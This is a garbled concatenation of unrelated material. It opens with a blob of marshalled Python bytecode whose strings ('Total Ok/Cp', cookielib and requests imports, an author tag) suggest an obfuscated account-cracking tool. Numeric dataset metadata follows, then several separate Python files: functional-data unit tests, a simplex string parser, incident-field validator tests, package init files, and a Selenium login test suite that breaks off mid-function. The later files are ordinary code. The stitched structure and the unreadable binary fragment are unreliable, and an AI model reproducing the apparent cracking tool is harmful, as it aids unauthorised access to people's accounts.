\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01\x1e\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x14\x02\x06\x01$\x01\x0f\x01\x0c\x01\x15\x01\x0f\x01\x19\x01\n\x01\x14\x02\x10\x01\x11\x01\x0f\x01\x19\x01\n\x01\x18\x02\x03\x01i\x1e\x00\x00\x00s \x00\x00\x00\x1b[1;93mThe process has completeds\x14\x00\x00\x00\x1b[1;93mTotal 
Ok/Cp :Rb\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;93mPress entet to back (\x1b\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x10\x00\x00\x00R!\x00\x00\x00RR\x00\x00\x00R2\x00\x00\x00R\x0b\x00\x00\x00Re\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00Rz\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00R\x00\x00\x00\x00Rh\x00\x00\x00(\x0c\x00\x00\x00Ri\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00Rk\x00\x00\x00Rl\x00\x00\x00R7\x00\x00\x00Rm\x00\x00\x00R+\x00\x00\x00Ra\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x02\x00\x00\x00R_\x00\x00\x00R`\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rz\x00\x00\x00\x94\x02\x00\x00s\xc6\x00\x00\x00\x00\x01\x0c\x01\x06\x01\x06\x01\x06\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01\x1b\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x0c\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x03\x01!\x01\x12\x01\r\x01\x07\x01\x05\x01\r\x01\x05\x01\x11\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0b\x01%\x01\x12\x01\x11\x01\n\x01\n\x01\x13\x01\x1c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01\x07\x01\x15\x01\r\x01\x05\x01\x05\x01\t\x01\x05\x01\x12~\x0c\x01\x10\x01\x05\x01\t\x01\x05\x01\x05\x01)\x01\x05\x01\t\x01\x05\x01\n\x01t\x08\x00\x00\x00__main__(1\x00\x00\x00R\x06\x00\x00\x00t\x03\x00\x00\x00sysR"\x00\x00\x00t\x08\x00\x00\x00datetimet\x02\x00\x00\x00ret\x06\x00\x00\x00randomt\x07\x00\x00\x00hashlibt\t\x00\x00\x00threadingR\x1e\x00\x00\x00t\x07\x00\x00\x00getpasst\x06\x00\x00\x00urllibt\t\x00\x00\x00cookielibR\x1c\x00\x00\x00t\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\x07\x00\x00\x00t\x04\x00\x00\x00patht\x06\x00\
x00\x00isfilet\x13\x00\x00\x00requests.exceptionsR\x02\x00\x00\x00R#\x00\x00\x00t\x07\x00\x00\x00randintt\x02\x00\x00\x00bdt\x03\x00\x00\x00simt\x04\x00\x00\x00reprR2\x00\x00\x00t\x06\x00\x00\x00reloadt\x12\x00\x00\x00setdefaultencodingR\x12\x00\x00\x00R\x13\x00\x00\x00t\x02\x00\x00\x00c3R\x08\x00\x00\x00R\x0b\x00\x00\x00R\n\x00\x00\x00R\x15\x00\x00\x00R\x14\x00\x00\x00R&\x00\x00\x00R\x0f\x00\x00\x00R=\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rd\x00\x00\x00Ro\x00\x00\x00Ru\x00\x00\x00Rv\x00\x00\x00R\x10\x00\x00\x00Rz\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x08\x00\x00\x00<module>\x04\x00\x00\x00sn\x00\x00\x00\x03\x01\x9c\x01\x14\x01\r\x01\r\x01\x11\x01\r\x0b\x12\x01\x10\x01\x12\x01\x10\x01\x10\x01\r\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\r\x01\r\x01\r\x01\r\x01\x05\x01\r\x01\x10\x01\x12\x01\x12\x01P\x01\n\x01\r\x01\x06\x01\x06\x01\x06\x02\t\x02\t\n\t\x0b\t\n\t"\t"\t,\t\xea\t\x0b\t\t\t\x12\t_\t+\t\x08\t,\t\xe2\x0c\x01'))
| 16,569.75
| 66,237
| 0.748276
| 15,099
| 66,279
| 3.279091
| 0.050864
| 0.205772
| 0.090525
| 0.04605
| 0.837006
| 0.801095
| 0.752883
| 0.72293
| 0.698734
| 0.65846
| 0
| 0.400027
| 0.010577
| 66,279
| 3
| 66,238
| 22,093
| 0.354967
| 0.000362
| 0
| 0
| 0
| 6.5
| 0.589217
| 0.424623
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 16
|
039a2fb23c4b4884eeedbea61f703521ad519e98
| 4,917
|
py
|
Python
|
tests/test_dense_functional_data.py
|
vishalbelsare/FDApy
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
[
"MIT"
] | 19
|
2019-02-11T08:35:29.000Z
|
2022-01-27T16:51:10.000Z
|
tests/test_dense_functional_data.py
|
vishalbelsare/FDApy
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
[
"MIT"
] | 4
|
2020-04-07T07:10:26.000Z
|
2022-02-09T16:33:19.000Z
|
tests/test_dense_functional_data.py
|
vishalbelsare/FDApy
|
50feb99e34f265b1c17a6f234a9d2f942ceb8f6d
|
[
"MIT"
] | 7
|
2020-04-24T13:24:02.000Z
|
2022-02-18T17:28:30.000Z
|
#!/usr/bin/python3.7
# -*-coding:utf8 -*
import numpy as np
import unittest
from FDApy.representation.functional_data import (DenseFunctionalData,
IrregularFunctionalData)
class TestDenseFunctionalData1D(unittest.TestCase):
    """Unit tests for DenseFunctionalData sampled on a one-dimensional grid."""

    def setUp(self):
        # Five observations sampled on the common grid {1, 2, 3, 4}.
        grid = {'input_dim_0': np.array([1, 2, 3, 4])}
        observations = np.array([
            [1, 2, 3, 4],
            [5, 6, 7, 9],
            [3, 4, 5, 7],
            [3, 4, 6, 1],
            [3, 4, 7, 6],
        ])
        self.dense_fd = DenseFunctionalData(grid, observations)

    def test_argvals_stand(self):
        # Standardized argvals map the grid onto [0, 1].
        expected = np.array([0., 0.33333333, 0.66666667, 1.])
        self.assertTrue(
            np.allclose(self.dense_fd.argvals_stand['input_dim_0'], expected))

    def test_n_obs(self):
        self.assertEqual(self.dense_fd.n_obs, 5)

    def test_n_dim(self):
        self.assertEqual(self.dense_fd.n_dim, 1)

    def test_range_obs(self):
        # Smallest and largest observed value across all curves.
        self.assertEqual(self.dense_fd.range_obs, (1, 9))

    def test_range_dim(self):
        expected = {'input_dim_0': (1, 4)}
        self.assertEqual(self.dense_fd.range_dim, expected)

    def test_shape(self):
        expected = {'input_dim_0': 4}
        self.assertEqual(self.dense_fd.shape, expected)

    def test_subset(self):
        # Integer indexing keeps a single observation.
        single = self.dense_fd[2]
        self.assertIsInstance(single, DenseFunctionalData)
        self.assertEqual(single.n_obs, 1)
        # Slice indexing keeps a contiguous subset of observations.
        several = self.dense_fd[1:4]
        self.assertIsInstance(several, DenseFunctionalData)
        self.assertEqual(several.n_obs, 3)

    def test_as_irregular(self):
        converted = self.dense_fd.as_irregular()
        self.assertIsInstance(converted, IrregularFunctionalData)
        self.assertEqual(converted.n_obs, 5)

    def test_is_compatible(self):
        # An object is always compatible with itself.
        self.assertTrue(self.dense_fd.is_compatible(self.dense_fd))

    def test_mean(self):
        expected = np.array([[3., 4., 5.6, 5.4]])
        self.assertTrue(np.allclose(self.dense_fd.mean().values, expected))
class TestDenseFunctionalData2D(unittest.TestCase):
    """Unit tests for DenseFunctionalData sampled on a two-dimensional grid."""

    def setUp(self):
        # Five observations on the 4 x 3 grid {1..4} x {5..7}.
        grid = {'input_dim_0': np.array([1, 2, 3, 4]),
                'input_dim_1': np.array([5, 6, 7])}
        observations = np.array([
            [[1, 2, 3], [1, 2, 3], [1, 2, 3], [1, 2, 3]],
            [[5, 6, 7], [5, 6, 7], [5, 6, 7], [5, 6, 7]],
            [[3, 4, 5], [3, 4, 5], [3, 4, 5], [3, 4, 5]],
            [[3, 4, 6], [3, 4, 5], [3, 4, 5], [3, 4, 5]],
            [[3, 4, 7], [3, 4, 5], [3, 4, 5], [3, 4, 5]],
        ])
        self.dense_fd = DenseFunctionalData(grid, observations)

    def test_argvals_stand(self):
        # Both grid axes are mapped onto [0, 1] independently.
        stand = self.dense_fd.argvals_stand
        ok_dim0 = np.allclose(stand['input_dim_0'],
                              np.array([0., 0.33333333, 0.66666667, 1.]))
        ok_dim1 = np.allclose(stand['input_dim_1'],
                              np.array([0., 0.5, 1.]))
        self.assertTrue(ok_dim0 and ok_dim1)

    def test_n_obs(self):
        self.assertEqual(self.dense_fd.n_obs, 5)

    def test_n_dim(self):
        self.assertEqual(self.dense_fd.n_dim, 2)

    def test_range_obs(self):
        # Smallest and largest observed value across all surfaces.
        self.assertEqual(self.dense_fd.range_obs, (1, 7))

    def test_range_dim(self):
        expected = {'input_dim_0': (1, 4), 'input_dim_1': (5, 7)}
        self.assertEqual(self.dense_fd.range_dim, expected)

    def test_shape(self):
        expected = {'input_dim_0': 4, 'input_dim_1': 3}
        self.assertEqual(self.dense_fd.shape, expected)

    def test_subset(self):
        # Integer indexing keeps a single observation.
        single = self.dense_fd[2]
        self.assertIsInstance(single, DenseFunctionalData)
        self.assertEqual(single.n_obs, 1)
        # Slice indexing keeps a contiguous subset of observations.
        several = self.dense_fd[1:4]
        self.assertIsInstance(several, DenseFunctionalData)
        self.assertEqual(several.n_obs, 3)

    def test_as_irregular(self):
        converted = self.dense_fd.as_irregular()
        self.assertIsInstance(converted, IrregularFunctionalData)
        self.assertEqual(converted.n_obs, 5)

    def test_is_compatible(self):
        # An object is always compatible with itself.
        self.assertTrue(self.dense_fd.is_compatible(self.dense_fd))

    def test_mean(self):
        expected = np.array([[[3., 4., 5.6],
                              [3., 4., 5.],
                              [3., 4., 5.],
                              [3., 4., 5.]]])
        self.assertTrue(np.allclose(self.dense_fd.mean().values, expected))
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 37.25
| 79
| 0.557657
| 654
| 4,917
| 3.943425
| 0.110092
| 0.105855
| 0.115161
| 0.017061
| 0.865839
| 0.83986
| 0.828228
| 0.828228
| 0.828228
| 0.759209
| 0
| 0.059842
| 0.306691
| 4,917
| 131
| 80
| 37.534351
| 0.696685
| 0.03315
| 0
| 0.59375
| 0
| 0
| 0.029523
| 0
| 0
| 0
| 0
| 0
| 0.291667
| 1
| 0.229167
| false
| 0
| 0.03125
| 0
| 0.28125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff13038786188a421bccf939abca99192e6af3d7
| 188
|
py
|
Python
|
tests/integrations/pytorch_lightning/loggers_test.py
|
allenai/tango
|
80c90caefae4ad1c3f8472718ddada912cd8fcf9
|
[
"Apache-2.0"
] | 52
|
2021-09-24T17:52:34.000Z
|
2022-03-29T22:55:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 90
|
2021-09-29T04:23:29.000Z
|
2022-03-31T21:23:02.000Z
|
tests/integrations/pytorch_lightning/loggers_test.py
|
keppy/tango
|
fbb78935a1c8a88c049e5ace0a2d0c7eeb4c8893
|
[
"Apache-2.0"
] | 8
|
2021-11-13T01:56:22.000Z
|
2022-02-27T03:29:42.000Z
|
from tango.integrations.pytorch_lightning.loggers import LightningLogger
def test_all_loggers_registered():
    """The CSV logger must be discoverable through the LightningLogger registry."""
    registered = LightningLogger.list_available()
    assert "pytorch_lightning::CSVLogger" in registered
| 31.333333
| 77
| 0.845745
| 21
| 188
| 7.285714
| 0.809524
| 0.20915
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 188
| 5
| 78
| 37.6
| 0.889535
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 0.148936
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
20cda4aeb3edeb780b7eecff0611e31b097458ab
| 6,592
|
py
|
Python
|
textOperator.py
|
Pakniat/PySimplex
|
0e2a1d0b3a1c5538e123e3b669c418b808a81341
|
[
"MIT"
] | 5
|
2018-07-22T17:17:10.000Z
|
2021-11-13T04:11:19.000Z
|
textOperator.py
|
Pakniat/PySimplex
|
0e2a1d0b3a1c5538e123e3b669c418b808a81341
|
[
"MIT"
] | null | null | null |
textOperator.py
|
Pakniat/PySimplex
|
0e2a1d0b3a1c5538e123e3b669c418b808a81341
|
[
"MIT"
] | 2
|
2018-11-16T15:46:18.000Z
|
2020-04-06T18:07:57.000Z
|
"""this class create for simple process on string"""
from simplex import Simplex
class Operator:
    """String-based helpers that parse edge text and build/remove simplices.

    Edge text is a sequence of single-character vertex labels in which ','
    separates groups and '.' terminates the final group, e.g. "12,13.".

    Ported from Python 2 (`<>` inequality operator, `print` statements) to
    Python 3, and the triplicated group-parsing loop is factored into the
    private helpers `_process_groups` / `_apply_group`.
    """

    def create_complete_connection(self, edgeText, vertices):
        """Insert every combination (size >= 2) of the labels in *edgeText*."""
        self._process_groups(self.get_combination(edgeText), vertices,
                             delete=False)
        return

    def create_simple_connection(self, edgeText, vertices):
        """Insert only the groups listed explicitly in *edgeText*."""
        self._process_groups(edgeText, vertices, delete=False)
        return

    def delete_connection(self, edgeText, vertices):
        """Remove the groups listed in *edgeText* from the structure."""
        self._process_groups(edgeText, vertices, delete=True)
        return

    def _process_groups(self, edgeText, vertices, delete):
        """Parse *edgeText* into label groups and insert/delete each one.

        A group is flushed whenever ',' or '.' is read; every other
        character is collected as a vertex label.
        """
        group = []
        for ch in edgeText:
            if ch != ',' and ch != '.':
                group.append(ch)
            else:
                group.sort()
                self._apply_group(group, vertices, delete)
                # NOTE(review): the original reset the group only after ','
                # and kept stale state after a mid-string '.'; resetting in
                # both cases is safer and identical for well-formed input
                # where '.' terminates the text.
                group = []
        return

    def _apply_group(self, group, vertices, delete):
        """Build Simplex nodes for a sorted *group* and attach/detach them.

        The first (smallest) label anchors the group: its vertex receives
        or loses the remaining labels as children.
        """
        graphs = []
        for label in group:
            node = Simplex(label)
            node.name = label
            graphs.append(node)
        # First element is the anchor node; the rest form the subtree.
        tree = graphs[1:]
        anchor = vertices[int(min(group)) - 1]
        if delete:
            anchor.delete_childs(tree)
            # Also drop the whole group from every lower-named vertex.
            for vertex in vertices:
                if int(vertex.name) < int(anchor.name):
                    vertex.delete_childs(graphs)
        else:
            anchor.insert_childs(tree)

    def show_structures(self, vertices):
        """Print the vertices, edges, triangles and tetrahedra."""
        for vertex in vertices:
            print('vertices are: ', vertex.name)
        for vertex in vertices:
            for value1 in vertex.childs.values():
                print('edges connection are: ',
                      value1.parents[vertex.name].name, '<--->', value1.name)
        for vertex in vertices:
            for value1 in vertex.childs.values():
                for value2 in value1.childs.values():
                    print('triangles connection are: ',
                          value1.parents[vertex.name].name, '<--->',
                          value1.name, '<--->', value2.name)
        for vertex in vertices:
            for value1 in vertex.childs.values():
                for value2 in value1.childs.values():
                    for value3 in value2.childs.values():
                        print('tetrahedron connection are: ',
                              value1.parents[vertex.name].name, '<--->',
                              value1.name, '<--->', value2.name, '<--->',
                              value3.name)

    def get_combination(self, edgeText):
        """Return every combination (size >= 2) of the characters in
        *edgeText* as a string: groups comma-separated, '.' terminated.

        Returns '' when *edgeText* has fewer than two characters (no
        combination exists), matching the original behaviour.
        """
        combos = []
        for size in range(2, len(edgeText) + 1):
            combos.extend(self.get_combination_list(edgeText, size))
        if not combos:
            return ''
        return ','.join(''.join(str(item) for item in combo)
                        for combo in combos) + '.'

    def get_combination_list(self, items, n):
        """Yield every n-element combination of *items*, preserving order."""
        if n == 0:
            yield []
        else:
            for i in range(len(items)):
                for rest in self.get_combination_list(items[i + 1:], n - 1):
                    yield [items[i]] + rest
| 42.805195
| 116
| 0.476335
| 649
| 6,592
| 4.804314
| 0.109399
| 0.056126
| 0.076972
| 0.056446
| 0.845093
| 0.816228
| 0.800513
| 0.794099
| 0.794099
| 0.794099
| 0
| 0.01161
| 0.398968
| 6,592
| 153
| 117
| 43.084967
| 0.775366
| 0.006523
| 0
| 0.75
| 0
| 0
| 0.020634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007143
| null | null | 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b305962f04f4a8d8b9e8e6029ec3a23cbdbef1b1
| 4,190
|
py
|
Python
|
Tests/scripts/hook_validations/tests/incident_field_test.py
|
RichieB2B/content
|
4916d6c5f024da79c22bda85272091e41a700bfa
|
[
"MIT"
] | 7
|
2020-09-24T22:38:01.000Z
|
2021-07-14T15:58:35.000Z
|
Tests/scripts/hook_validations/tests/incident_field_test.py
|
RichieB2B/content
|
4916d6c5f024da79c22bda85272091e41a700bfa
|
[
"MIT"
] | 9
|
2021-02-08T20:51:18.000Z
|
2021-09-23T23:27:38.000Z
|
Tests/scripts/hook_validations/tests/incident_field_test.py
|
RichieB2B/content
|
4916d6c5f024da79c22bda85272091e41a700bfa
|
[
"MIT"
] | 2
|
2020-12-08T17:03:33.000Z
|
2021-07-13T18:32:06.000Z
|
from Tests.scripts.hook_validations.incident_field import IncidentFieldValidator
def test_is_valid_name_sanity():
    """A well-formed incident field passes the name check and full validation."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    field = {
        'cliName': 'sanity name',
        'name': 'sanity name',
        'id': 'incident',
        'content': True,
    }
    validator.current_incident_field = field
    assert validator.is_valid_name()
    assert validator.is_valid()
def test_is_valid_name_bad_cli_name():
    """Each reserved word used as cliName fails the name check and validation."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    bad_cli_names = ('Incident', 'case', 'Playbook', 'Alerting feature',
                     'INciDeNts')
    for bad_cli_name in bad_cli_names:
        validator.current_incident_field = {
            'cliName': bad_cli_name,
            'name': 'sanity name',
            'content': True,
        }
        assert not validator.is_valid_name()
        assert not validator.is_valid()
def test_is_valid_name_bad_name():
    """Each reserved word used as name fails the name check and validation."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    bad_names = ('Incident', 'case', 'Playbook', 'Alerting feature',
                 'INciDeNts')
    for bad_name in bad_names:
        validator.current_incident_field = {
            'cliName': 'sanity name',
            'name': bad_name,
            'content': True,
        }
        assert not validator.is_valid_name()
        assert not validator.is_valid()
def test_is_valid_content_flag_sanity():
    """content=True satisfies the content-flag check and full validation."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    validator.current_incident_field = {'content': True}
    assert validator.is_valid_content_flag()
    assert validator.is_valid()
def test_is_valid_content_flag_invalid_values():
    """An explicit False flag, or a missing flag, fails validation."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    for field in ({'content': False}, {'something': True}):
        validator.current_incident_field = field
        assert not validator.is_valid_content_flag()
        assert not validator.is_valid()
def test_is_valid_system_flag_sanity():
    """system=False, or no system key at all, passes the system-flag check."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    valid_fields = (
        {'system': False, 'content': True},
        {'content': True},
    )
    for field in valid_fields:
        validator.current_incident_field = field
        assert validator.is_valid_system_flag()
        assert validator.is_valid()
def test_is_valid_system_flag_invalid():
    """system=True fails the system-flag check and full validation."""
    validator = IncidentFieldValidator('temp_file', check_git=False)
    validator.current_incident_field = {
        'system': True,
        'content': True,
    }
    assert not validator.is_valid_system_flag()
    assert not validator.is_valid()
| 26.518987
| 80
| 0.659189
| 459
| 4,190
| 5.705882
| 0.087146
| 0.109584
| 0.207713
| 0.198549
| 0.913708
| 0.905307
| 0.875143
| 0.861397
| 0.859107
| 0.792287
| 0
| 0
| 0.232458
| 4,190
| 157
| 81
| 26.687898
| 0.814366
| 0
| 0
| 0.648
| 0
| 0
| 0.131026
| 0
| 0
| 0
| 0
| 0
| 0.272
| 1
| 0.056
| false
| 0
| 0.008
| 0
| 0.064
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
64096dc8757d1167f4b5cd6be8438ef82939bf15
| 284
|
py
|
Python
|
feature_encoders/validate/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/validate/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/validate/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
from .schemas import (
CategoricalSchema,
CyclicalSchema,
DatetimeSchema,
LinearSchema,
SplineSchema,
TrendSchema,
)
# Explicit public API of this package: the schema classes re-exported
# from the .schemas module above.
__all__ = [
    "CategoricalSchema",
    "CyclicalSchema",
    "DatetimeSchema",
    "LinearSchema",
    "SplineSchema",
    "TrendSchema",
]
| 15.777778
| 24
| 0.647887
| 16
| 284
| 11.25
| 0.625
| 0.344444
| 0.5
| 0.633333
| 0.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0.246479
| 284
| 17
| 25
| 16.705882
| 0.841122
| 0
| 0
| 0
| 0
| 0
| 0.28169
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
641ea04e45cab2797d3513cfb29855a914fc70c3
| 144
|
py
|
Python
|
syslinkats/framework/aws/__init__.py
|
stick152/SystemLink-Python-ATS
|
82b0fac9bae22b808ba519fa4425a931ff3c77aa
|
[
"MIT"
] | null | null | null |
syslinkats/framework/aws/__init__.py
|
stick152/SystemLink-Python-ATS
|
82b0fac9bae22b808ba519fa4425a931ff3c77aa
|
[
"MIT"
] | null | null | null |
syslinkats/framework/aws/__init__.py
|
stick152/SystemLink-Python-ATS
|
82b0fac9bae22b808ba519fa4425a931ff3c77aa
|
[
"MIT"
] | null | null | null |
from syslinkats.framework.aws.aws_base import AWSBase
from syslinkats.framework.aws.aws_base import AWSHTTPStatusError
# Module author marker; no runtime effect.
__author__ = 'sedwards'
| 28.8
| 64
| 0.854167
| 18
| 144
| 6.5
| 0.555556
| 0.239316
| 0.393162
| 0.444444
| 0.666667
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 144
| 4
| 65
| 36
| 0.886364
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
642809bdea4994bef038000c5dedc4f5c054a9c4
| 224
|
py
|
Python
|
src/plugins/leetcode/test_data_source.py
|
umimori13/mai-bot
|
90e10f6488942809d4ca5ef342f403b683dbc904
|
[
"MIT"
] | null | null | null |
src/plugins/leetcode/test_data_source.py
|
umimori13/mai-bot
|
90e10f6488942809d4ca5ef342f403b683dbc904
|
[
"MIT"
] | null | null | null |
src/plugins/leetcode/test_data_source.py
|
umimori13/mai-bot
|
90e10f6488942809d4ca5ef342f403b683dbc904
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from data_source import get_leetcode_question_everyday
class Test(TestCase):
    """Smoke tests for the leetcode data source."""

    def test_get_leetcode_question_every_day(self):
        # Smoke test: passes as long as the fetch does not raise.
        # (The original contained commented-out dead code `#self.fail()`,
        # which has been removed.)
        get_leetcode_question_everyday()
| 22.4
| 54
| 0.78125
| 29
| 224
| 5.62069
| 0.586207
| 0.202454
| 0.349693
| 0.331288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.165179
| 224
| 9
| 55
| 24.888889
| 0.871658
| 0.049107
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
643755f38a7706eab7dcb793080d3b47e2567821
| 27,585
|
py
|
Python
|
budgetsupervisor/users/tests/test_live_server.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 1
|
2022-03-01T10:28:31.000Z
|
2022-03-01T10:28:31.000Z
|
budgetsupervisor/users/tests/test_live_server.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | 75
|
2020-11-07T20:14:55.000Z
|
2021-10-05T15:08:22.000Z
|
budgetsupervisor/users/tests/test_live_server.py
|
ltowarek/budget-supervisor
|
862a2d720aecd4ad2fded9c63bc839190ebbc77e
|
[
"MIT"
] | null | null | null |
from typing import Callable, Iterable
import pytest
from budget.models import Account, Connection, Transaction
from django.core import mail
from django.shortcuts import reverse
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from saltedge_wrapper.factory import customers_api
from selenium.webdriver.firefox.webdriver import WebDriver
from swagger_client.rest import ApiException
from users.models import Profile, User
from users.services import create_customer_in_saltedge
from users.tokens import user_tokenizer
# Mark every test in this module with the `selenium` marker so the browser
# suite can be selected or deselected as a group.
pytestmark = pytest.mark.selenium
class TestLogin:
    """End-to-end tests for the login page, driven through Selenium
    against a live test server."""

    def test_valid_credentials_redirect_to_budget_index(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """Logging in with good credentials lands on the budget index."""
        url = live_server_path(reverse("login"))
        selenium.get(url)
        self.login_user(selenium, "foo", "password")
        assert selenium.current_url == live_server_path(reverse("budget_index"))

    def test_password_reset_link_is_available(
        self, selenium: WebDriver, live_server_path: Callable[[str], str],
    ) -> None:
        """The login page links to the password-reset view."""
        url = live_server_path(reverse("login"))
        selenium.get(url)
        element = selenium.find_element_by_link_text("Forgot password?")
        assert element.get_attribute("href") == live_server_path(
            reverse("password_reset")
        )

    def test_invalid_credentials_prints_error_message(
        self, selenium: WebDriver, live_server_path: Callable[[str], str]
